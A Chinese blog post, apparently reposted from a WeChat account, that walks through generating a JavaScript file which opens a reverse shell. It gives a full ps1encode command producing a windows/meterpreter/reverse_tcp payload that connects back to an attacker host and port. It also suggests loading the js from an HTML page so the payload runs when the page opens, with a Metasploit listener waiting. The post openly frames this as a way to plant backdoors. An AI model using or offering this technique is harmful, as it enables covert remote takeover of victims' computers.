关注我们

利用js文件反弹shell

张三张三 安全文摘 2019-07-08 94311 0

0x00:简介

    前两天在freebuf上看到一个利用Ink文件触发攻击链的文章,确实佩服作者的脑洞。

https://www.freebuf.com/articles/system/207109.html

    网络世界千奇百怪,多样式留后门,触发条件反弹shell.操作够骚才是王道。

0x01:过程

一、利用工具

https://github.com/CroweCybersecurity/ps1encode

二、环境配置

    它有很多种生成方式,详情请移步gayhub上查看

    今天利用生成的js文件来反弹shell

利用js文件反弹shell

命令:./ps1encode.rb--LHOST 192.168.124.11 --LPORT 6666 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

利用此命令生成js文件

利用js文件反弹shell

    emmm!代码很长,自己复制出来放到txt编辑器里。

并重命名为1.js(文件名随意)。

利用js文件反弹shell

    单单放一个js太单调了。实际环境下可以配合html进行调用js文件执行。

    

利用js文件反弹shell

    我简单的写了一个html来调用js文件

当然你也可以 一个js就反弹

利用js文件反弹shell

准备好msf回弹的环境

执行exploit 坐等监听执行

三、执行效果

利用js文件反弹shell

效果图

视频效果图

0x02:后话

    或许我的步骤会出现错误、或许我的想法会出现错误。但是我的思路是偏僻的。我每次写的文章想表达不是炫技,我跟各位比,我还是小学生,我是小菜鸟。我想表达的是思路。如果以后有表达不清楚的,造成您的质疑,您可以问我,或者百度。

文由微信公众号洛米唯熊

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址